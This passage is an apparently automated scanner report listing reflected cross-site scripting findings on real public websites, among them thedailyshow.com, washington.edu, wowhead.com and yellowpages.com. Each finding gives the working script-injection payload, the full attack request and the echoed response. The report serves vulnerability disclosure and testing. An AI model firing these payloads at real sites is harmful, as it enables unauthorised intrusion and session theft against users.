User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thedailybeast.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 02 Apr 2011 13:40:14 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 60091

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/favicon.ico4df34"><script>alert(1)</script>277514e1af2"/>
...[SNIP]...

6.95. http://www.thedailyshow.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailyshow.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4544"><script>alert(1)</script>da6a196bf6a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoc4544"><script>alert(1)</script>da6a196bf6a HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thedailyshow.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.63 (Unix) PHP/5.3.1
X-Powered-By: PHP/5.3.1
Content-Type: text/html;charset=utf-8
Content-Length: 26317
Cache-Control: max-age=1800
Date: Sat, 02 Apr 2011 13:31:49 GMT
Connection: close


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
   <head>
       <title></title>
       <meta name="description" content=
...[SNIP]...
<link rel="canonical" href="http://www.thedailyshow.com/favicon.icoc4544"><script>alert(1)</script>da6a196bf6a" />
...[SNIP]...

6.96. http://www.thehollywoodgossip.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thehollywoodgossip.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c583c"><script>alert(1)</script>086663f75c8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /favicon.icoc583c"><script>alert(1)</script>086663f75c8 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thehollywoodgossip.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:40:10 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: fullsite=true; path=/; domain=.thehollywoodgossip.com; expires=Sat, 02-Apr-2011 14:40:10 GMT
Set-Cookie: mut=173.193.214.243.1301751610082221; path=/; expires=Sat, 30-Apr-11 13:40:10 GMT; domain=.thehollywoodgossip.com
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=kcfer0dro823m5qhqakd4rpij2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20009

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<link rel="canonical" href="http://www.thehollywoodgossip.com/favicon.icoc583c"><script>alert(1)</script>086663f75c8/" />
...[SNIP]...

6.97. http://www.thirdage.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thirdage.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad228"><script>alert(1)</script>abbf960315 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoad228"><script>alert(1)</script>abbf960315 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thirdage.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny9
X-Drupal-Cache: MISS
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 02 Apr 2011 13:41:56 +0000
Cache-Control: public, max-age=600
Set-Cookie: SESSfa98039aa221fd92e5bcd6d7e3f1cdbb=194f49e907f67adbbd4334f28a385153; expires=Mon, 25 Apr 2011 17:15:16 GMT; path=/; domain=.thirdage.com
Vary: Cookie,Accept-Encoding
Web-Head: web09.advomatic.com
Content-Type: text/html; charset=utf-8
Content-Length: 30060
Date: Sat, 02 Apr 2011 13:41:56 GMT
X-Varnish: 635034219
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" di
...[SNIP]...
<form action="/user/login?destination=/favicon.icoad228"><script>alert(1)</script>abbf960315" method="post" id="user-login">
...[SNIP]...

6.98. http://www.thomasnet.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thomasnet.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8619e"><script>alert(1)</script>1a24f501080 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico8619e"><script>alert(1)</script>1a24f501080 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thomasnet.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:59:57 GMT
Server: Apache/2.0.59 (Unix) mod_ssl/2.0.59 OpenSSL/0.9.7a PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: _tnetses=4d972bdd7eed3; path=/; domain=.thomasnet.com
Set-Cookie: _usrvst=1; expires=Mon, 02-Apr-2012 04:00:00 GMT; path=/; domain=.thomasnet.com
Set-Cookie: tnuind=%7C; path=/; domain=.thomasnet.com
Set-Cookie: am1vst=1; expires=Mon, 02-Apr-2012 04:00:00 GMT; path=/; domain=.thomasnet.com
Set-Cookie: am1rm=PP; expires=Mon, 02-Apr-2012 04:00:00 GMT; path=/; domain=.thomasnet.com
Set-Cookie: tbv2ns=Y; path=/; domain=.thomasnet.com
Set-Cookie: tbv2showPushDown=Y; path=/; domain=.thomasnet.com
Set-Cookie: am1cmp=1; path=/; domain=.thomasnet.com
Set-Cookie: referq=deleted; expires=Fri, 02-Apr-2010 13:59:56 GMT; path=/; domain=.thomasnet.com
Set-Cookie: UUS=4d972bdd7f6a8; path=/; domain=.thomasnet.com
Set-Cookie: us=4d972bdd7f6a8; path=/; domain=.thomasnet.com
Set-Cookie: GID=G13017527975219; expires=Mon, 02-Apr-2012 04:00:00 GMT; path=/; domain=.thomasnet.com
Set-Cookie: tinid=deleted; expires=Fri, 02-Apr-2010 13:59:56 GMT; path=/; domain=.thomasnet.com
Set-Cookie: UUID=deleted; expires=Fri, 02-Apr-2010 13:59:56 GMT; path=/; domain=.thomasnet.com
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 21410

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US">
<head>
<META name="y_key" content="6e6d842e318a7ef3">
<meta name="verify-v1"
...[SNIP]...
<a href="/print/screen/favicon.ico8619e"><script>alert(1)</script>1a24f501080" onClick="dcsExternal('/link.html','TINCATL1=TNET&TINCATL2=CLICK_PRINTSCREEN','www.thomasnet.com');" target="print" rel="nofollow">
...[SNIP]...

6.99. http://www.tradekey.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tradekey.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 77a87'-alert(1)-'8bb423fecbf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico77a87'-alert(1)-'8bb423fecbf HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tradekey.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:57:15 GMT
Server: Apache
Set-Cookie: PHPSESSID=bfc0f1346d753424ab94cfa33828a2d4; path=/; domain=.tradekey.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 21900

<html dir=ltr>
<head>
<title>Error 404 Page not found, Business to Business marketplace, Manufacturer directory & import export</title>
<link href="http://imgusr.tradekey.com/domains/tradekey.com/t
...[SNIP]...
Date();
   var d = t.getDate() + "-" + t.getMonth()+1 + "-" + t.getFullYear();
   
   if (seconds > 1 || d == "20-01-2011")
       tk_track_ga_event('IT', 'Page Render Time - www.tradekey.com', '/favicon.ico77a87'-alert(1)-'8bb423fecbf', seconds);
}
var old_load_fx = window.onload;
window.onload = function()
{
   track_page_render_time();
   if (old_load_fx)
       old_load_fx();
}
</script>
...[SNIP]...

6.100. http://www.trails.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.trails.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ece72'-alert(1)-'ee1533a6222 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoece72'-alert(1)-'ee1533a6222 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.trails.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 21954
Expires: Sat, 02 Apr 2011 13:38:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:38:51 GMT
Connection: close
Set-Cookie: ASP.NET_SessionId=ahv4dy55qvwmlcyvaiur4g45; domain=.trails.com; path=/; HttpOnly


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphpr
...[SNIP]...
ils.com',
                   jscdn: 'http://cdn2-www.trails.com',
                   logout: 'https://ssl.trails.com/logout.aspx',
                   login: 'https://ssl.trails.com/login.aspx?r=http%3a%2f%2fwww.trails.com%3a80%2ffavicon.icoece72'-alert(1)-'ee1533a6222',
                   signup: 'https://ssl.trails.com/subscribe.aspx',
                   account: 'https://ssl.trails.com/myaccount/',
                   profile: 'http://www.trails.com/mytrails/?p=profile'
               },
               user: {
                   name:
...[SNIP]...

6.101. http://www.travelpod.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.travelpod.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7550a"><script>alert(1)</script>10b5dcdc5a1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico7550a"><script>alert(1)</script>10b5dcdc5a1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.travelpod.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:11:07 GMT
Server: Apache
Content-language: "
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 7980

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head> <title>Oh, Ohhh ...</title> <link rel="shortcut icon" href="/favicon.ico"/>
<script type="text/javascript">function L
...[SNIP]...
<a href="http://www.travelpod.ca/favicon.ico7550a"><script>alert(1)</script>10b5dcdc5a1">
...[SNIP]...

6.102. http://www.videojug.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.videojug.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6eb1'-alert(1)-'18394e848c1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /f6eb1'-alert(1)-'18394e848c1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.videojug.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 20692
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: VideoJugUser=YnFn6uAuzgEkAAAAYWEzY2U5ZjgtYzNkYi02MmYxLTFiNTAtZmYwMDA4Y2RiZjU10; expires=Mon, 01-Apr-2013 13:57:58 GMT; path=/; HttpOnly
Set-Cookie: abTest=0; expires=Sat, 30-Apr-2011 13:57:58 GMT; path=/
Set-Cookie: ASP.NET_SessionId=gyrhnaenatluzrnn3li1fr55; path=/; HttpOnly
Set-Cookie: VjPrefEd=cc=US&ed=3; expires=Tue, 02-Apr-2013 13:57:58 GMT; path=/
Set-Cookie: AuthCookie=false; expires=Mon, 04-Apr-2011 13:57:58 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:57:57 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<a class="m mixFlag big UK" href="/chooseedition?ReturnURL=%2ferror%2ferror404%3faspxerrorpath%3d%252froute.ashx%252ff6eb1'-alert(1)-'18394e848c1&amp;NewEdition=2" >
...[SNIP]...

6.103. http://www.videosurf.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.videosurf.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88f07"><script>alert(1)</script>33281413b15 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico88f07"><script>alert(1)</script>33281413b15 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.videosurf.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Sat, 02 Apr 2011 13:39:23 GMT
Server: Apache/2.2.16 (Ubuntu)
X-Powered-By: PHP/5.3.3-1ubuntu9.3
Set-Cookie: PHPSESSID=rm91d0sieefthupdu4pqg3oq33; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: vsb=95; expires=Sun, 01-Apr-2012 13:39:23 GMT; path=/; domain=.videosurf.com
Set-Cookie: VSID=4d97270b593c3; expires=Sun, 01-Apr-2012 13:39:23 GMT; path=/; domain=.videosurf.com
Set-Cookie: luri=L2Zhdmljb24uaWNvODhmMDciPjxzY3JpcHQ%2BYWxlcnQoMSk8L3NjcmlwdD4zMzI4MTQxM2IxNQ%3D%3D; path=/; domain=.videosurf.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xm
...[SNIP]...
<meta property="og:url" content="http://www.videosurf.com/favicon.ico88f07"><script>alert(1)</script>33281413b15"/>
...[SNIP]...

6.104. http://www.walletpop.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.walletpop.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc0cc"><script>alert(1)</script>d118f04eeae was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bc0cc"><script>alert(1)</script>d118f04eeae HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.walletpop.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:20:26 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=-%3A%3A-%3A%3A%3A%3A%3A%3A%3A%3A-; expires=Sun, 03-Apr-2011 14:20:26 GMT; path=/
Content-Type: text/html
Content-Length: 34369

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h
...[SNIP]...
<link rel="canonical" href="http://www.walletpop.com/bc0cc"><script>alert(1)</script>d118f04eeae/"/>
...[SNIP]...

6.105. http://www.washington.edu/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.washington.edu
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload caf60<img%20src%3da%20onerror%3dalert(1)>2b58733a9f9 was submitted in the REST URL parameter 1. This input was echoed as caf60<img src=a onerror=alert(1)>2b58733a9f9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /favicon.icocaf60<img%20src%3da%20onerror%3dalert(1)>2b58733a9f9 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.washington.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:19:39 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1174
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/favicon.icocaf60&lt;img src=a onerror=alert(1)&gt;2b58733a9f9</b> was not found or is no lon
...[SNIP]...
<br>
Reason: File does not exist: /www/world/favicon.icocaf60<img src=a onerror=alert(1)>2b58733a9f9.</br>
...[SNIP]...

6.106. http://www.wowhead.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wowhead.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 919c3"><script>alert(1)</script>12d36552cd5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico919c3"><script>alert(1)</script>12d36552cd5 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wowhead.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:33:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny9
Cache-Control: no-cache, must-revalidate, max-age=604800
Expires: Sat, 09 Apr 2011 13:33:32 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8308

<!DOCTYPE html>
<html>
<head>

<title>Page Not Found - Wowhead</title>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="description" content="It appears that the
...[SNIP]...
<body class="favicon_ico919c3"><script>alert(1)</script>12d36552cd5">
...[SNIP]...

6.107. http://www.wowhead.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wowhead.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6a6c7'-alert(1)-'d930151ee15 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico6a6c7'-alert(1)-'d930151ee15 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wowhead.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:33:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny9
Cache-Control: no-cache, must-revalidate, max-age=604800
Expires: Sat, 09 Apr 2011 13:33:33 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8122

<!DOCTYPE html>
<html>
<head>

<title>Page Not Found - Wowhead</title>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="description" content="It appears that the
...[SNIP]...
<![CDATA[
var g_pageInfo = { articleUrl: 'favicon.ico6a6c7'-alert(1)-'d930151ee15', editAccess: 574 };
//]]>
...[SNIP]...

6.108. http://www.yakaz.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yakaz.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d0b98<img%20src%3da%20onerror%3dalert(1)>861ec7fe5e5 was submitted in the REST URL parameter 1. This input was echoed as d0b98<img src=a onerror=alert(1)>861ec7fe5e5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /favicon.icod0b98<img%20src%3da%20onerror%3dalert(1)>861ec7fe5e5 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.yakaz.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Yakaz Web Server
Date: Sat, 02 Apr 2011 13:59:51 GMT
Content-Length: 93174
Content-Type: text/html; charset=utf-8
Set-Cookie: il=en; expires=Sun, 01-Apr-2012 13:59:51 GMT; path=/; domain=.yakaz.com
Set-Cookie: YSID=63238dac50279b2939e0c29adb0e3dea; path=/; domain=.yakaz.com
Set-Cookie: infos=deleted; expires=Fri, 02-Apr-2010 13:59:50 GMT; path=/; domain=.yakaz.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:v="urn:schemas-microsoft-co
...[SNIP]...
<h1>Favicon.icod0b98<img Src=a Onerror=alert(1)>861ec7fe5e5</h1>
...[SNIP]...

6.109. http://www.yellowpages.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.yellowpages.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54dd2</script><a>f1938ad83fa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /54dd2</script><a>f1938ad83fa HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.yellowpages.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:44:27 GMT
Status: 200 OK
Connection: keep-alive
Server: nginx
Content-Type: text/html; charset=utf-8
ETag: "efc9b484b7207b82659734d8cfebfe0f"
Cache-Control: no-cache
Set-Cookie: search_terms=script%3E%3Ca%3Ef1938ad83fa; path=/
Set-Cookie: parity_analytics=---+%0A%3Avisit_id%3A+jh14baofnio57yzbozczk0ikdipjq%0A%3Avisit_start_time%3A+2011-04-02+12%3A44%3A26.842806+%2B00%3A00%0A%3Alast_page_load%3A+2011-04-02+12%3A44%3A26.842811+%2B00%3A00%0A; path=/; expires=Wed, 02-Apr-2036 12:44:26 GMT
Set-Cookie: vrid=de53bf40-3f54-012e-53bd-00163ebee541; domain=.yellowpages.com; path=/; expires=Sat, 02-Apr-2016 12:44:26 GMT
Set-Cookie: _parity_session=BAh7BzoPc2Vzc2lvbl9pZCIlNGUzNjI4OGEyMDYyYzdkMDlhODhhYjk2Njk3ODhhYjM6E2RleF9zZXNzaW9uX2lkSSIpZGU1NTdmZTAtM2Y1NC0wMTJlLTUzYmUtMDAxNjNlYmVlNTQxBjoGRUY%3D--a614b3974beb8c37155b66aa649d5cc0df7037fd; path=/; HttpOnly
Set-Cookie: b=10011; domain=.yellowpages.com; path=/; expires=Thu, 20 Dec 2012 00:00:01 GMT
X-Urid: d-ddea1480-3f54-012e-fd15-00163ebee541
Expires: Sat, 02 Apr 2011 12:44:26 GMT
Content-Length: 324385

<!DOCTYPE html>
<html>
<head>

<title>No Location Found - YP.com</title>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
<meta content="" name="description" />
<meta content="" n
...[SNIP]...
aq.push(['_setAllowAnchor',true]);
_gaq.push(['_setDomainName', ".yellowpages.com"]);
_gaq.push(['_setCustomVar', 1, 'trial_id', "relevancyControl1", 1]);

_gaq.push(['_trackPageview','/54dd2</script><a>f1938ad83fa?gasearch=script%3E%3Ca%3Ef1938ad83fa']);

(function() {
var s, ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = "http://www.goo
...[SNIP]...

6.110. http://www.yellowpages.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yellowpages.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c496d<img%20src%3da%20onerror%3dalert(1)>63985e825a0 was submitted in the REST URL parameter 1. This input was echoed as c496d<img src=a onerror=alert(1)>63985e825a0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /c496d<img%20src%3da%20onerror%3dalert(1)>63985e825a0 HTTP/1.1
